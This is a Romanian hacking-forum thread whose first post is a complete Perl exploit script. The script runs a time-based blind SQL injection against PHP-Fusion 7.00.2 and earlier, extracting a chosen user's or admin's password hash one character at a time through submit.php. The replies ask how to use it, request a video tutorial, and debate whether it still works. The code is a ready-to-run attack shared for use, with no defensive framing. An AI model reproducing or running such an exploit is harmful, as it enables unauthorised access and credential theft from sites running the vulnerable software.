Guest vini4p Posted December 25, 2008 Report Posted December 25, 2008 #!/usr/bin/perl -w# -------------------------------------------------------# PHP-Fusion <= 7.00.2 Remote Blind SQL Injection Exploit# by athos - staker[at]hotmail[dot]it# download on http://php-fusion.co.uk# -------------------------------------------------------# Usage:# perl xpl.pl host/path prefix user_id user_pwd target_id# perl xpl.pl localhost/php-fusion fusion 5 anarchy 1# -------------------------------------------------------# Note: magic_quotes_gpc off # don't add me on msn messenger # my email staker.38@gmail.com# # Greetz: str0ke,The:Paradox,darkjoker,Key and #cancer # -------------------------------------------------------# User Password: my $field = "user_password" ;# Admin Password: my $field = "user_admin_password"; # -------------------------------------------------------use strict;use Digest::MD5('md5_hex');use LWP::UserAgent;my $field = "user_password";my ($stop,$start,$hash);my $domain = shift;my $ptable = shift;my $ulogin = shift;my $plogin = shift;my $userid = shift or &usage;my @chars = (48..57, 97..102); my $substr = 1; my $http = new LWP::UserAgent;sub send_request{ my $post = undef; my $host = $domain; my $param = shift @_ or die $!; $host .= "/submit.php?stype=l"; $http->default_header('Cookie' => "fusion_user=${ulogin}.".md5_hex($plogin)); $post = $http->post('http://'.$host,[ 'link_category' => 1, 'link_name' => 1, 'link_url' => 1, 'link_description' => 1, 'submit_link' => 'Submit+Link', 'submit_info[pwn]' => $param, ]);}sub give_char{ my $send = undef; my ($charz,$uidz) = @_; $send = "' or (select if((ascii(substring". "($field,$uidz,1))=$charz),". "benchmark(230000000,char(0)),". "0) from ${ptable}_users where user_id=$userid))#"; return $send;}for(1..32) { foreach my $set(@chars) { my $start = time(); send_request(give_char($set,$substr)); my $stop = time(); if($stop - $start > 6) { syswrite(STDOUT,chr($set)); $substr++; last; } }}sub usage{ print "PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit\n"; print "by athos - staker[at]hotmail[dot]it\n"; print "Usage: perl $0 [host/path] [table prefix] [id] [password] [target id]\n"; print "Usage: perl $0 localhost/php-fusion fusion 5 p4ssw0rd 1\n"; exit; } Quote
Hugo Posted March 18, 2009 Report Posted March 18, 2009 Cred ca pt cei interesati (si mai nepriceputi) ar fi mai de ajutor daca ai scrie si catea cuvinte despre ce sa faca cu textul de mai sus! Efortul este apreciat oricum:) Quote
fjtr Posted March 18, 2009 Report Posted March 18, 2009 # -------------------------------------------------------# Usage:# perl xpl.pl host/path prefix user_id user_pwd target_id# perl xpl.pl localhost/php-fusion fusion 5 anarchy 1# ------------------------------------------------------- Quote
hi2na Posted March 20, 2009 Report Posted March 20, 2009 ceva scris ar fi supper sau mai super un tutorial video pls :D: Quote
luyzette Posted March 20, 2009 Report Posted March 20, 2009 vini4p iti cam place sa te lasi rugat? Quote
Laur13 Posted July 2, 2009 Report Posted July 2, 2009 Iit bat la pariu ca nu merge exploitul ... Ps : este expoloit in perl, active perl ... il downloadezi dp ActivePerl Quote
Laur13 Posted July 2, 2009 Report Posted July 2, 2009 Cred ca pt cei interesati (si mai nepriceputi) ar fi mai de ajutor daca ai scrie si catea cuvinte despre ce sa faca cu textul de mai sus! Efortul este apreciat oricum:)Eu am raspuns la ce mia zis hugo ... Quote
Zatarra Posted July 3, 2009 Report Posted July 3, 2009 Laur nu sti tu sa`l faci sa mearga aia ii altceva Quote
Laur13 Posted July 3, 2009 Report Posted July 3, 2009 ma.... se executa cu perl .. cum sa nu stiu sa mearga nu merge la php fusion sa rezolvat de mult vulnerabilitatea Quote
Vlachs Posted July 4, 2009 Report Posted July 4, 2009 ma.... se executa cu perl .. cum sa nu stiu sa mearga nu merge la php fusion sa rezolvat de mult vulnerabilitateadaca ai venit sa te dai scafandru pe aici mai bine lasa-ne, logic ca pentru versiunea indicata inca merge( PHP-Fusion <= 7.0.2) Quote
Laur13 Posted July 4, 2009 Report Posted July 4, 2009 (edited) benny loppa scuze dar nu am venit aici sa ma dau mare eu stiu 1 % din ce sti tu .Eu m-am referit ca nu merge pe ultima versiune .Am incercat vulnerabilitatea e functionala. Edited July 4, 2009 by Laur13 Quote
Zatarra Posted July 6, 2009 Report Posted July 6, 2009 Ce se mai scoate baiatul.. nu are rost sa`i explici benny ca tot nu intzelege Quote
